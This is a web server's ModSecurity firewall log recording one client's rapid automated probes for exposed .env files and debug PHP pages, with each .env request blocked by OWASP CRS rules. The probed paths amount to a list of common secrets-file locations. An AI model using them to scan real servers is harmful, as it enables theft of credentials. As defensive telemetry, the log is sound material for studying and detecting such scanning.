[Mon May 11 11:43:34.599771 2026] [security2:error] [pid 1254242:tid 1254259] [client 213.209.159.175:3254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agGkxr4KNmD_mZ_vlf81eQAAAE4"]
[Mon May 11 11:43:34.599989 2026] [security2:error] [pid 1254242:tid 1254259] [client 213.209.159.175:3254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agGkxr4KNmD_mZ_vlf81eQAAAE4"]
[Mon May 11 11:43:34.601210 2026] [security2:error] [pid 1254242:tid 1254259] [client 213.209.159.175:3254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxr4KNmD_mZ_vlf81eQAAAE4"]
[Mon May 11 11:43:34.666626 2026] [security2:error] [pid 1256241:tid 1256268] [client 213.209.159.175:3258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agGkxpkIEwRJMyDaV55LpgAAAVY"]
[Mon May 11 11:43:34.666830 2026] [security2:error] [pid 1256241:tid 1256268] [client 213.209.159.175:3258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agGkxpkIEwRJMyDaV55LpgAAAVY"]
[Mon May 11 11:43:34.668216 2026] [security2:error] [pid 1256241:tid 1256268] [client 213.209.159.175:3258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxpkIEwRJMyDaV55LpgAAAVY"]
[Mon May 11 11:43:34.756663 2026] [security2:error] [pid 1254133:tid 1254157] [client 213.209.159.175:3274] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agGkxhjZymfuKpjWXeh5xgAAANU"]
[Mon May 11 11:43:34.756884 2026] [security2:error] [pid 1254133:tid 1254157] [client 213.209.159.175:3274] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agGkxhjZymfuKpjWXeh5xgAAANU"]
[Mon May 11 11:43:34.757891 2026] [security2:error] [pid 1254133:tid 1254157] [client 213.209.159.175:3274] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxhjZymfuKpjWXeh5xgAAANU"]
[Mon May 11 11:43:34.802470 2026] [security2:error] [pid 1254328:tid 1254345] [client 213.209.159.175:3282] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agGkxkRdw2n9wv6Ai48FBAAAAI8"]
[Mon May 11 11:43:34.802701 2026] [security2:error] [pid 1254328:tid 1254345] [client 213.209.159.175:3282] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agGkxkRdw2n9wv6Ai48FBAAAAI8"]
[Mon May 11 11:43:34.804360 2026] [security2:error] [pid 1254328:tid 1254345] [client 213.209.159.175:3282] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxkRdw2n9wv6Ai48FBAAAAI8"]
[Mon May 11 11:43:34.944644 2026] [security2:error] [pid 1254133:tid 1254143] [client 213.209.159.175:3304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agGkxhjZymfuKpjWXeh5xwAAAMc"]
[Mon May 11 11:43:34.944849 2026] [security2:error] [pid 1254133:tid 1254143] [client 213.209.159.175:3304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agGkxhjZymfuKpjWXeh5xwAAAMc"]
[Mon May 11 11:43:34.946674 2026] [security2:error] [pid 1254133:tid 1254143] [client 213.209.159.175:3304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxhjZymfuKpjWXeh5xwAAAMc"]
[Mon May 11 11:43:34.989229 2026] [:error] [pid 1254328:tid 1254339] [client 213.209.159.175:3314] File does not exist: /var/www/html/app_dev.php
[Mon May 11 11:43:35.037532 2026] [security2:error] [pid 1254179:tid 1254182] [client 213.209.159.175:3320] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agGkx2S6k_SCYd1AVZqrzwAAAQE"]
[Mon May 11 11:43:35.037753 2026] [security2:error] [pid 1254179:tid 1254182] [client 213.209.159.175:3320] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agGkx2S6k_SCYd1AVZqrzwAAAQE"]
[Mon May 11 11:43:35.041629 2026] [security2:error] [pid 1254179:tid 1254182] [client 213.209.159.175:3320] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx2S6k_SCYd1AVZqrzwAAAQE"]
[Mon May 11 11:43:35.084352 2026] [security2:error] [pid 1256241:tid 1256261] [client 213.209.159.175:3334] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/demo/.env"] [unique_id "agGkx5kIEwRJMyDaV55LqAAAAU8"]
[Mon May 11 11:43:35.084593 2026] [security2:error] [pid 1256241:tid 1256261] [client 213.209.159.175:3334] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/demo/.env"] [unique_id "agGkx5kIEwRJMyDaV55LqAAAAU8"]
[Mon May 11 11:43:35.087899 2026] [security2:error] [pid 1256241:tid 1256261] [client 213.209.159.175:3334] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx5kIEwRJMyDaV55LqAAAAU8"]
[Mon May 11 11:43:35.131091 2026] [security2:error] [pid 1254212:tid 1254223] [client 213.209.159.175:3338] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agGkx0YQeUtAPynIs6xVjAAAAAk"]
[Mon May 11 11:43:35.132526 2026] [security2:error] [pid 1254212:tid 1254223] [client 213.209.159.175:3338] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agGkx0YQeUtAPynIs6xVjAAAAAk"]
[Mon May 11 11:43:35.133364 2026] [security2:error] [pid 1254212:tid 1254223] [client 213.209.159.175:3338] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx0YQeUtAPynIs6xVjAAAAAk"]
[Mon May 11 11:43:35.231038 2026] [security2:error] [pid 1254328:tid 1254353] [client 213.209.159.175:3348] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agGkx0Rdw2n9wv6Ai48FBgAAAJg"]
[Mon May 11 11:43:35.231281 2026] [security2:error] [pid 1254328:tid 1254353] [client 213.209.159.175:3348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agGkx0Rdw2n9wv6Ai48FBgAAAJg"]
[Mon May 11 11:43:35.232104 2026] [security2:error] [pid 1254328:tid 1254353] [client 213.209.159.175:3348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx0Rdw2n9wv6Ai48FBgAAAJg"]
[Mon May 11 11:43:35.275392 2026] [security2:error] [pid 1254179:tid 1254186] [client 213.209.159.175:3362] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agGkx2S6k_SCYd1AVZqr0AAAAQU"]
[Mon May 11 11:43:35.275614 2026] [security2:error] [pid 1254179:tid 1254186] [client 213.209.159.175:3362] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agGkx2S6k_SCYd1AVZqr0AAAAQU"]
[Mon May 11 11:43:35.277695 2026] [security2:error] [pid 1254179:tid 1254186] [client 213.209.159.175:3362] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx2S6k_SCYd1AVZqr0AAAAQU"]
[Mon May 11 11:43:35.320279 2026] [security2:error] [pid 1254242:tid 1254261] [client 213.209.159.175:3372] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agGkx74KNmD_mZ_vlf81ewAAAFA"]
[Mon May 11 11:43:35.320502 2026] [security2:error] [pid 1254242:tid 1254261] [client 213.209.159.175:3372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agGkx74KNmD_mZ_vlf81ewAAAFA"]
[Mon May 11 11:43:35.322364 2026] [security2:error] [pid 1254242:tid 1254261] [client 213.209.159.175:3372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx74KNmD_mZ_vlf81ewAAAFA"]
[Mon May 11 11:43:35.365474 2026] [security2:error] [pid 1256241:tid 1256248] [client 213.209.159.175:3378] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bot/.env"] [unique_id "agGkx5kIEwRJMyDaV55LqQAAAUI"]
[Mon May 11 11:43:35.365698 2026] [security2:error] [pid 1256241:tid 1256248] [client 213.209.159.175:3378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bot/.env"] [unique_id "agGkx5kIEwRJMyDaV55LqQAAAUI"]
[Mon May 11 11:43:35.366950 2026] [security2:error] [pid 1256241:tid 1256248] [client 213.209.159.175:3378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx5kIEwRJMyDaV55LqQAAAUI"]
[Mon May 11 11:43:35.410444 2026] [:error] [pid 1254133:tid 1254149] [client 213.209.159.175:3380] File does not exist: /var/www/html/test.php
[Mon May 11 11:43:35.534826 2026] [security2:error] [pid 1254133:tid 1254149] [client 213.209.159.175:3380] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.save.1"] [unique_id "agGkxxjZymfuKpjWXeh5ygAAAM0"]
[Mon May 11 11:43:35.534996 2026] [security2:error] [pid 1254133:tid 1254149] [client 213.209.159.175:3380] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.save.1"] [unique_id "agGkxxjZymfuKpjWXeh5ygAAAM0"]
[Mon May 11 11:43:35.536541 2026] [security2:error] [pid 1254133:tid 1254149] [client 213.209.159.175:3380] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxxjZymfuKpjWXeh5ygAAAM0"]
